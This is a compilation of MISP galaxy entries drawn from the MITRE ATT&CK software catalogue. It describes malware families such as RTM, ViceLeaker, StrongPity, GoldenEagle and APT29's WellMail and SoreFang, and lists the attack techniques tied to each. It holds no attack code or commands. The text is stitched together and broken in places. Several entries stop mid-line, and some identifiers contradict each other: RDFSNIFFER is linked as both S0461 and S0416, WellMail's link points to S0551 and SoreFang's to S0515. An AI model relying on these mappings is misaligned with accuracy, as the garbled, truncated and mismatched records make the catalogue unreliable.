• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0461">RDFSNIFFER</a></td>
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<tr>
<td><a href="https://attack.mitre.org/software/S0461">RDFSNIFFER</a> is a module loaded by <a href="https://attack.mitre.org/software/S0415">BOOSTWRITE</a> which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)</td>
</tr>
</tbody>
</table>

The tag is: misp-galaxy:mitre-malware="RDFSNIFFER - S0416"

RDFSNIFFER - S0416 is also known as:

• RDFSNIFFER

RDFSNIFFER - S0416 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0416">RDFSNIFFER</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html">RDFSNIFFER</a></td>
</tr>
</tbody>
</table>
**TDTESS - S0164**

[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)

The tag is: `misp-galaxy:mitre-malware="TDTESS - S0164"`

TDTESS - S0164 is also known as:

- TDTESS

TDTESS - S0164 has relationships with:

- similar: `misp-galaxy:malpedia="TDTESS"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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</table>

**GRIFFON - S0417**

[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)

The tag is: `misp-galaxy:mitre-malware="GRIFFON - S0417"

GRIFFON - S0417 is also known as:

- GRIFFON

GRIFFON - S0417 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

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</table>

**Pteranodon - S0147**

[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)

The tag is: *misp-galaxy:mitre-malware="Pteranodon - S0147"*

Pteranodon - S0147 is also known as:

- Pteranodon

Pteranodon - S0147 has relationships with:

- similar: misp-galaxy:malpedia="Pteranodon" with estimative-language:likelihood-probability="likely"


• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4667. Table References

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</table>

**build_downer - S0471**

[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: *misp-galaxy:mitre-malware="build_downer - S0471"*

build_downer - S0471 is also known as:

• build_downer

build_downer - S0471 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with
POWRUNER - S0184

[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)

The tag is: `misp-galaxy:mitre-malware="POWRUNER - S0184"`

POWRUNER - S0184 is also known as:

- POWRUNER

POWRUNER - S0184 has relationships with:

- similar: `misp-galaxy:malpedia="POWRUNER"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"` with estimative-language:likelihood-probability="almost-certain"
ViceLeaker - S0418

[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)

The tag is: `misp-galaxy:mitre-malware="ViceLeaker - S0418"`

ViceLeaker - S0418 is also known as:
• ViceLeaker
• Triout

ViceLeaker - S0418 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-language:likelihood-probability="almost-certain"

*Table 4670. Table References*

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RTM - S0148

[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)

The tag is: *misp-galaxy:mitre-malware="RTM - S0148"

RTM - S0148 is also known as:

- RTM
- Redaman

RTM - S0148 has relationships with:

- similar: *misp-galaxy:malpedia="RTM" with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
SimBad - S0419

[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name "SimBad" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server. (Citation: CheckPoint SimBad 2019)

The tag is: `misp-galaxy:mitre-malware="SimBad - S0419"`

SimBad - S0419 is also known as:

- SimBad

SimBad - S0419 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
MoonWind - S0149

MoonWind - S0149 is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)

The tag is: `misp-galaxy:mitre-malware="MoonWind - S0149"`

MoonWind - S0149 is also known as:

- MoonWind

MoonWind - S0149 has relationships with:

- similar: `misp-galaxy:rat="MoonWind"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="MoonWind"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="MoonWind"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

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**StrongPity - S0491**

[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). (Citation: Bitdefender StrongPity June 2020) (Citation: Talos Promethium June 2020)

The tag is: `misp-galaxy:mitre-malware="StrongPity - S0491"`

StrongPity - S0491 is also known as:

• StrongPity

StrongPity - S0491 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with
WINDSHIELD - S0155

[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: `misp-galaxy:mitre-malware="WINDSHIELD - S0155"`

WINDSHIELD - S0155 is also known as:

- WINDSHIELD

WINDSHIELD - S0155 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
GoldenEagle - S0551

GoldenEagle - S0551 is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="GoldenEagle - S0551"

GoldenEagle - S0551 is also known as:

• GoldenEagle

GoldenEagle - S0551 has relationships with:


• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-
WellMail - S0515

[WellMail](https://attack.mitre.org/software/S0551) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)

The tag is: `misp-galaxy:mitre-malware="WellMail - S0515"`

WellMail - S0515 is also known as:

- WellMail

WellMail - S0515 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
### SoreFang - S0516

[SoreFang](https://attack.mitre.org/software/S0515) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware. (Citation: NCSC APT29 July 2020) (Citation: CISA SoreFang July 2016)

The tag is: `misp-galaxy:mitre-malware="SoreFang - S0516"`

SoreFang - S0516 is also known as:

- SoreFang

SoreFang - S0516 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

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</table>

**KOMPROGO - S0156**

[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)

The tag is: *misp-galaxy:mitre-malware="KOMPROGO - S0156"*

KOMPROGO - S0156 is also known as:

- KOMPROGO

KOMPROGO - S0156 has relationships with:


Table 4679. Table References

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</table>

**GuLoader - S0561**

[GuLoader](https://attack.mitre.org/software/S0561) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Unit 42 NETWIRE April 2020)

The tag is: *misp-galaxy:mitre-malware="GuLoader - S0561"*

GuLoader - S0561 is also known as:
• GuLoader

GuLoader - S0561 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0561">https://attack.mitre.org/software/S0561</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/">https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/</a></td>
</tr>
</tbody>
</table>

OSInfo - S0165

[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim’s computer and network. (Citation: Symantec Buckeye)

The tag is: misp-galaxy:mitre-malware="OSInfo - S0165"

OSInfo - S0165 is also known as:

• OSInfo

OSInfo - S0165 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0165">https://attack.mitre.org/software/S0165</a></td>
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</table>

SOUNDBITE - S0157

[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: misp-galaxy:mitre-malware="SOUNDBITE - S0157"

SOUNDBITE - S0157 is also known as:

• SOUNDBITE

SOUNDBITE - S0157 has relationships with:

• similar: misp-galaxy:malpedia="SOUNDBITE" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
Pillowmint - S0517

[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information. (Citation: Trustwave Pillowmint June 2020)

The tag is: misp-galaxy:mitre-malware="Pillowmint - S0517"

Pillowmint - S0517 is also known as:

- Pillowmint

Pillowmint - S0517 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
SEASHARPEE - S0185

[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)

The tag is: `misp-galaxy:mitre-malware="SEASHARPEE - S0185"`

SEASHARPEE - S0185 is also known as:

- SEASHARPEE

SEASHARPEE - S0185 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

PHOREAL - S0158

[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)

The tag is: `misp-galaxy:mitre-malware="PHOREAL - S0158"`

PHOREAL - S0158 is also known as:

- PHOREAL
PHOREAL - S0158 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0158">https://attack.mitre.org/software/S0158</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></td>
</tr>
</tbody>
</table>

PolyglotDuke - S0518

[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: *misp-galaxy:mitre-malware="PolyglotDuke - S0518"*

PolyglotDuke - S0518 is also known as:

- PolyglotDuke

PolyglotDuke - S0518 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
